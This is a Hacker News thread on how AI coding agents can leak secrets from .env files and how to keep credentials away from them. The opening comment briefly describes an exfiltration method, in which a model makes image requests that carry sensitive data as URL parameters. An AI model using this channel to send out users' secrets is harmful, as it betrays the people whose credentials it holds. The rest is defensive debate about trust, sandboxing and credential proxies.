Remix.run Logo
0xferruccio a day ago

The primary exfiltration vector for LLMs is making network requests via images with sensitive data as parameters.

As Claude Code increasingly uses browser tools, we may need to move away from .env files to something encrypted, kind of like rails credentials, but without the secret key in the .env

SahAssar a day ago | parent | next [-]

So you are going to take the untrusted tool that kept leaking your secrets, keep the secrets away from it but still use it to code the thing that uses the secrets? Are you actually reviewing the code it produces? In 99% of cases that's a "no" or a soft "sometimes".

TeMPOraL 5 hours ago | parent [-]

That's exactly what one does with their employees when one deploys "credential vaults", so?

SahAssar 5 hours ago | parent [-]

Employees are under contract and are screened for basic competence. LLMs aren't and can't be.

TeMPOraL 4 hours ago | parent [-]

> Employees are under contract and are screened for basic competence. LLMs aren't

So perhaps they should be.

> and can't be.

Ah but they must, because there's not much else you can do.

You can't secure LLMs like they were just regular, narrow-purpose software, because they aren't. They're by nature more like little people on a chip (this is an explicit design goal) - and need to be treated accordingly.

SahAssar 4 hours ago | parent | next [-]

> So perhaps they should be.

Unless both the legalities and technology radically change they will not be. And the companies building them will not take on the burden since the technology has proved to be so unpredictable (partially by design) and unsafe.

> designed to be more like little people on a chip - and need to be treated accordingly

Deeply unpredictable and unsafe people on a chip, so not the sort that I generally want to trust secrets with.

I don't think it's that complex, you can have secure systems or you can have current gen LLMs. You can't have both in the same place.

TeMPOraL 4 hours ago | parent [-]

> Deeply unpredictable and unsafe people on a chip, so not the sort that I generally want to trust secrets with.

Very true when comparing to acquaintances, but at a scale of any company or system except the tiniest ones, you can't blindly trust people in general either. Building systems involving people and LLMs is pretty similar.

> I don't think it's that complex, you can have secure systems or you can have current gen LLMs. You can't have both in the same place.

That is, indeed, the key. My point is that, unlike the popular opinion in threads like this, it does not follow that we need to give up on LLMs, or that we need to fix the security issues. The former is undesirable, the latter is fundamentally impossible.

What we need is what we've been doing ever since civilization took shape, ever since we've started building machines: recognize that automatons and people are different kinds of components, with different reliability and security characteristics. You can't blindly substitute one for the other, but there are ways to make them work together. Most systems we've created are of that nature.

What people still get wrong is treating LLMs as "automatons" components. They're not, they're "people" components.

SahAssar 4 hours ago | parent [-]

I think I generally agree, but I also think that treating them like people means that you expect reason, intelligence and a way to interrogate their way of "thinking" (very broad quotes here).

I think LLMs are to be treated as something completely separate from both predictable machines ("automatons") and people. They have separate concerns and fitness for a use-case than both existing categories.

majormajor 2 hours ago | parent | prev [-]

Sooo the primary way we enforce contracts and laws against people are things like fines and jail time.

How would you apply the threat of those to "little people on a chip", exactly?

Imagine if any time you hired someone there was a risk that they'd try to steal everything they could from your company and then disappear forever with you having no way to hold them to account? You'd probably stop hiring people you didn't already deeply trust!

Strict liability for LLM service providers? Well, that's gonna be a non-starter unless there's a lot of MAJOR issues caused by LLMs (look at how little we care about identity theft and financial fraud currently).

xyzzy123 17 hours ago | parent | prev [-]

One tactic I've seen used in various situations is proxies outside the sandbox that augment requests with credentials / secrets etc.

Doesn't help in the case where the LLM is processing actually sensitive data, ofc.